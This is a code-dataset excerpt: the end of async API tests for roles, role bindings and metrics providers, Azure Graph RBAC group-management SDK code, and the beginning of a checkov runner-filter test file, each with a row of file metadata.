async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.create_global_metrics_provider(body=data)
assert received.api == "core"
assert received.kind == "GlobalMetricsProvider"
assert received.metadata.name == data.metadata.name
assert received.metadata.namespace is None
assert received.metadata.created
assert received.metadata.modified
stored = await db.get(GlobalMetricsProvider, name=data.metadata.name)
assert stored == received
async def test_delete_global_metrics_provider(aiohttp_server, config, db, loop):
data = GlobalMetricsProviderFactory(metadata__finalizers="keep-me")
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.delete_global_metrics_provider(
name=data.metadata.name
)
assert received.api == "core"
assert received.kind == "GlobalMetricsProvider"
assert received.spec == data.spec
assert received.metadata.deleted is not None
stored = await db.get(GlobalMetricsProvider, name=data.metadata.name)
assert stored == received
async def test_list_global_metrics_providers(aiohttp_server, config, db, loop):
# Populate database
data = [
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
]
for elt in data:
await db.put(elt)
# Start API server
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.list_global_metrics_providers()
assert received.api == "core"
assert received.kind == "GlobalMetricsProviderList"
key = attrgetter("metadata.name")
assert sorted(received.items, key=key) == sorted(data, key=key)
@with_timeout(3)
async def test_watch_global_metrics_providers(aiohttp_server, config, db, loop):
data = [
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
]
async def modify():
for elt in data:
await db.put(elt)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
async with core_api.watch_global_metrics_providers() as watcher:
modifying = loop.create_task(modify())
async for i, event in aenumerate(watcher):
expected = data[i]
assert event.type == WatchEventType.ADDED
assert event.object == expected
# subtract 1 for the zero-based index offset and 1 more for the
# resource in another namespace
if i == len(data) - 2:
break
await modifying
async def test_read_global_metrics_provider(aiohttp_server, config, db, loop):
data = GlobalMetricsProviderFactory()
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.read_global_metrics_provider(name=data.metadata.name)
assert received == data
async def test_update_global_metrics_provider(aiohttp_server, config, db, loop):
data = GlobalMetricsProviderFactory(spec__type="static")
await db.put(data)
data.spec = MetricsProviderSpecFactory(type="prometheus")
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.update_global_metrics_provider(
name=data.metadata.name, body=data
)
assert received.api == "core"
assert received.kind == "GlobalMetricsProvider"
assert received.spec == data.spec
assert data.metadata.modified < received.metadata.modified
stored = await db.get(GlobalMetricsProvider, name=data.metadata.name)
assert stored == received
async def test_create_role(aiohttp_server, config, db, loop):
data = RoleFactory()
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.create_role(body=data)
assert received.api == "core"
assert received.kind == "Role"
assert received.metadata.name == data.metadata.name
assert received.metadata.namespace is None
assert received.metadata.created
assert received.metadata.modified
stored = await db.get(Role, name=data.metadata.name)
assert stored == received
async def test_delete_role(aiohttp_server, config, db, loop):
data = RoleFactory(metadata__finalizers="keep-me")
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.delete_role(name=data.metadata.name)
assert received.api == "core"
assert received.kind == "Role"
assert received.metadata.deleted is not None
stored = await db.get(Role, name=data.metadata.name)
assert stored == received
async def test_list_roles(aiohttp_server, config, db, loop):
# Populate database
data = [
RoleFactory(),
RoleFactory(),
RoleFactory(),
RoleFactory(),
RoleFactory(),
RoleFactory(),
]
for elt in data:
await db.put(elt)
# Start API server
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.list_roles()
assert received.api == "core"
assert received.kind == "RoleList"
key = attrgetter("metadata.name")
assert sorted(received.items, key=key) == sorted(data, key=key)
@with_timeout(3)
async def test_watch_roles(aiohttp_server, config, db, loop):
data = [RoleFactory(), RoleFactory(), RoleFactory(), RoleFactory()]
async def modify():
for elt in data:
await db.put(elt)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
async with core_api.watch_roles() as watcher:
modifying = loop.create_task(modify())
async for i, event in aenumerate(watcher):
expected = data[i]
assert event.type == WatchEventType.ADDED
assert event.object == expected
# subtract 1 for the zero-based index offset and 1 more for the
# resource in another namespace
if i == len(data) - 2:
break
await modifying
async def test_read_role(aiohttp_server, config, db, loop):
data = RoleFactory()
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.read_role(name=data.metadata.name)
assert received == data
async def test_update_role(aiohttp_server, config, db, loop):
data = RoleFactory()
await db.put(data)
data.rules.append(RoleRuleFactory())
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.update_role(name=data.metadata.name, body=data)
assert received.api == "core"
assert received.kind == "Role"
assert received.rules == data.rules
assert data.metadata.modified < received.metadata.modified
stored = await db.get(Role, name=data.metadata.name)
assert stored == received
async def test_create_role_binding(aiohttp_server, config, db, loop):
data = RoleBindingFactory()
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.create_role_binding(body=data)
assert received.api == "core"
assert received.kind == "RoleBinding"
assert received.metadata.name == data.metadata.name
assert received.metadata.namespace is None
assert received.metadata.created
assert received.metadata.modified
stored = await db.get(RoleBinding, name=data.metadata.name)
assert stored == received
async def test_delete_role_binding(aiohttp_server, config, db, loop):
data = RoleBindingFactory(metadata__finalizers="keep-me")
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.delete_role_binding(name=data.metadata.name)
assert received.api == "core"
assert received.kind == "RoleBinding"
assert received.metadata.deleted is not None
stored = await db.get(RoleBinding, name=data.metadata.name)
assert stored == received
async def test_list_role_bindings(aiohttp_server, config, db, loop):
# Populate database
data = [
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
]
for elt in data:
await db.put(elt)
# Start API server
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.list_role_bindings()
assert received.api == "core"
assert received.kind == "RoleBindingList"
key = attrgetter("metadata.name")
assert sorted(received.items, key=key) == sorted(data, key=key)
@with_timeout(3)
async def test_watch_role_bindings(aiohttp_server, config, db, loop):
data = [
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
]
async def modify():
for elt in data:
await db.put(elt)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
async with core_api.watch_role_bindings() as watcher:
modifying = loop.create_task(modify())
async for i, event in aenumerate(watcher):
expected = data[i]
assert event.type == WatchEventType.ADDED
assert event.object == expected
# subtract 1 for the zero-based index offset and 1 more for the
# resource in another namespace
if i == len(data) - 2:
break
await modifying
async def test_read_role_binding(aiohttp_server, config, db, loop):
data = RoleBindingFactory()
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.read_role_binding(name=data.metadata.name)
assert received == data
async def test_update_role_binding(aiohttp_server, config, db, loop):
data = RoleBindingFactory()
await db.put(data)
data.users.append("test-user")
data.roles.append("test-role")
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.update_role_binding(
name=data.metadata.name, body=data
)
assert received.api == "core"
assert received.kind == "RoleBinding"
assert received.users == data.users
assert received.roles == data.roles
assert data.metadata.modified < received.metadata.modified
stored = await db.get(RoleBinding, name=data.metadata.name)
assert stored == received
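# Added sketch (hedged): a minimal async counterpart of enumerate(),
# mirroring the aenumerate helper imported from krake.test_utils at the top
# of this file (the real helper may differ); shown only to clarify the
# watch-test loops above. The underscore name marks it as illustrative.
async def _aenumerate_sketch(aiterable, start=0):
    index = start
    async for item in aiterable:
        yield index, item
        index += 1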
| 32.716094 | 87 | 0.676155 | 2,161 | 18,092 | 5.540028 | 0.056455 | 0.073672 | 0.037421 | 0.046776 | 0.935516 | 0.876211 | 0.871784 | 0.841547 | 0.814066 | 0.793017 | 0 | 0.001132 | 0.218992 | 18,092 | 552 | 88 | 32.775362 | 0.846143 | 0.026476 | 0 | 0.744845 | 0 | 0 | 0.068311 | 0.005001 | 0 | 0 | 0 | 0 | 0.234536 | 1 | 0 | false | 0 | 0.018041 | 0 | 0.018041 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e1ae12d2fd816c19fcba586ad1882fa982061343 | 26,579 | py | Python | azure-graphrbac/azure/graphrbac/operations/groups_operations.py | CharaD7/azure-sdk-for-python | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | [
"MIT"
] | null | null | null | azure-graphrbac/azure/graphrbac/operations/groups_operations.py | CharaD7/azure-sdk-for-python | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | [
"MIT"
] | null | null | null | azure-graphrbac/azure/graphrbac/operations/groups_operations.py | CharaD7/azure-sdk-for-python | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
import uuid
from .. import models
class GroupsOperations(object):
"""GroupsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client Api Version. Constant value: "1.6".
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "1.6"
self.config = config
def is_member_of(
self, group_id, member_id, custom_headers=None, raw=False, **operation_config):
"""Checks whether the specified user, group, contact, or service
principal is a direct or a transitive member of the specified group.
:param group_id: The object ID of the group to check.
:type group_id: str
:param member_id: The object ID of the contact, group, user, or
service principal to check for membership in the specified group.
:type member_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CheckGroupMembershipResult
<azure.graphrbac.models.CheckGroupMembershipResult>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.CheckGroupMembershipParameters(group_id=group_id, member_id=member_id)
# Construct URL
url = '/{tenantID}/isMemberOf'
path_format_arguments = {
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'CheckGroupMembershipParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CheckGroupMembershipResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def remove_member(
self, group_object_id, member_object_id, custom_headers=None, raw=False, **operation_config):
"""Remove a memeber from a group. Reference:
https://msdn.microsoft.com/en-us/library/azure/ad/graph/api/groups-operations#DeleteGroupMember.
:param group_object_id: Group object id
:type group_object_id: str
:param member_object_id: Member Object id
:type member_object_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/{tenantID}/groups/{groupObjectId}/$links/members/{memberObjectId}'
path_format_arguments = {
'groupObjectId': self._serialize.url("group_object_id", group_object_id, 'str', skip_quote=True),
'memberObjectId': self._serialize.url("member_object_id", member_object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [204]:
raise models.GraphErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def add_member(
self, group_object_id, url, custom_headers=None, raw=False, **operation_config):
"""Add a memeber to a group. Reference:
https://msdn.microsoft.com/en-us/library/azure/ad/graph/api/groups-operations#AddGroupMembers.
:param group_object_id: Group object id
:type group_object_id: str
:param url: Member Object Url as
"https://graph.windows.net/0b1f9851-1bf0-433f-aec3-cb9272f093dc/directoryObjects/f260bbc4-c254-447b-94cf-293b5ec434dd",
where "0b1f9851-1bf0-433f-aec3-cb9272f093dc" is the tenantId and
"f260bbc4-c254-447b-94cf-293b5ec434dd" is the objectId of the member
(user, application, servicePrincipal, group) to be added.
:type url: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.GroupAddMemberParameters(url=url)
# Construct URL
url = '/{tenantID}/groups/{groupObjectId}/$links/members'
path_format_arguments = {
'groupObjectId': self._serialize.url("group_object_id", group_object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GroupAddMemberParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [204]:
raise models.GraphErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, group_object_id, custom_headers=None, raw=False, **operation_config):
"""Delete a group in the directory. Reference:
http://msdn.microsoft.com/en-us/library/azure/dn151676.aspx.
:param group_object_id: Object id
:type group_object_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/{tenantID}/groups/{groupObjectId}'
path_format_arguments = {
'groupObjectId': self._serialize.url("group_object_id", group_object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [204]:
raise models.GraphErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def create(
self, display_name, mail_nickname, custom_headers=None, raw=False, **operation_config):
"""Create a group in the directory. Reference:
http://msdn.microsoft.com/en-us/library/azure/dn151676.aspx.
:param display_name: Group display name
:type display_name: str
:param mail_nickname: Mail nick name
:type mail_nickname: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ADGroup <azure.graphrbac.models.ADGroup>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.GroupCreateParameters(display_name=display_name, mail_nickname=mail_nickname)
# Construct URL
url = '/{tenantID}/groups'
path_format_arguments = {
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GroupCreateParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [201]:
raise models.GraphErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 201:
deserialized = self._deserialize('ADGroup', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list(
self, filter=None, custom_headers=None, raw=False, **operation_config):
"""Gets list of groups for the current tenant.
:param filter: The filter to apply on the operation.
:type filter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ADGroupPaged <azure.graphrbac.models.ADGroupPaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/{tenantID}/groups'
path_format_arguments = {
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = '/{tenantID}/{nextLink}'
path_format_arguments = {
'nextLink': self._serialize.url("next_link", next_link, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ADGroupPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ADGroupPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
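# Added note (hedged): the internal_paging closure above is handed to the
# generated *Paged collection, which invokes it first with next_link=None
# for the initial request and then once per nextLink fragment returned by
# the service, so callers simply iterate the returned collection. The same
# closure pattern recurs in get_group_members and get_member_groups below.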
def get_group_members(
self, object_id, custom_headers=None, raw=False, **operation_config):
"""Gets the members of a group.
:param object_id: Group object ID whose members should be retrieved.
:type object_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`AADObjectPaged
<azure.graphrbac.models.AADObjectPaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/{tenantID}/groups/{objectId}/members'
path_format_arguments = {
'objectId': self._serialize.url("object_id", object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = '/{tenantID}/{nextLink}'
path_format_arguments = {
'nextLink': self._serialize.url("next_link", next_link, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.AADObjectPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.AADObjectPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def get(
self, object_id, custom_headers=None, raw=False, **operation_config):
"""Gets group information from the directory.
:param object_id: The object ID of the group for which to get information.
:type object_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ADGroup <azure.graphrbac.models.ADGroup>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/{tenantID}/groups/{objectId}'
path_format_arguments = {
'objectId': self._serialize.url("object_id", object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ADGroup', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_member_groups(
self, object_id, security_enabled_only, custom_headers=None, raw=False, **operation_config):
"""Gets a collection that contains the Object IDs of the groups of which
the group is a member.
:param object_id: The object ID of the group whose membership is checked.
:type object_id: str
:param security_enabled_only: If true, only membership in security-enabled
groups should be checked. Otherwise, membership in all groups should be
checked.
:type security_enabled_only: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`strPaged <azure.graphrbac.models.strPaged>`
"""
parameters = models.GroupGetMemberGroupsParameters(security_enabled_only=security_enabled_only)
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/{tenantID}/groups/{objectId}/getMemberGroups'
path_format_arguments = {
'objectId': self._serialize.url("object_id", object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GroupGetMemberGroupsParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.strPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.strPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
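# Added usage sketch (hedged; assumes a configured GraphRbacManagementClient
# named graph_client plus valid tenant_id and member_id values, with
# credential setup omitted): these operations are reached through the
# generated client rather than instantiated directly.
#
#     group = graph_client.groups.create(
#         display_name="example-group", mail_nickname="examplegroup")
#     graph_client.groups.add_member(
#         group_object_id=group.object_id,
#         url="https://graph.windows.net/{}/directoryObjects/{}".format(
#             tenant_id, member_id))
#     for g in graph_client.groups.list(filter="startswith(displayName,'example')"):
#         print(g.display_name)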
| 44.972927 | 144 | 0.650175 | 2,872 | 26,579 | 5.812326 | 0.081825 | 0.035344 | 0.025879 | 0.038819 | 0.839154 | 0.825915 | 0.820404 | 0.811538 | 0.798598 | 0.792847 | 0 | 0.007381 | 0.250724 | 26,579 | 590 | 145 | 45.049153 | 0.830831 | 0.266225 | 0 | 0.783333 | 0 | 0 | 0.131582 | 0.061285 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043333 | false | 0 | 0.01 | 0 | 0.116667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bed198b1b4257fbc0b9ac94f2c5fad2b2a77e9ec | 18,663 | py | Python | tests/common/test_runner_filter.py | Kostavro/checkov | 55c5c6144683b251d7e8d2c11955f29f6a11183d | [
"Apache-2.0"
] | null | null | null | tests/common/test_runner_filter.py | Kostavro/checkov | 55c5c6144683b251d7e8d2c11955f29f6a11183d | [
"Apache-2.0"
] | null | null | null | tests/common/test_runner_filter.py | Kostavro/checkov | 55c5c6144683b251d7e8d2c11955f29f6a11183d | [
"Apache-2.0"
] | null | null | null | import unittest
from checkov.common.bridgecrew.severities import Severities, BcSeverities
from checkov.common.checks.base_check import BaseCheck
from checkov.runner_filter import RunnerFilter
class TestRunnerFilter(unittest.TestCase):
# Expected pseudo-code for when checks should run:
# if has_check_flag_specified():
# checks_to_run = checks_specifically_included
# else:
# checks_to_run = all_built_in_checks
# if has_checks_dir_specified():
# checks_to_run += checks_from_external_dir
# for skipped_check in skip_check_flags():
# checks_to_run.remove(skipped_check)
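# Concrete illustration (added, hedged; consistent with the tests below):
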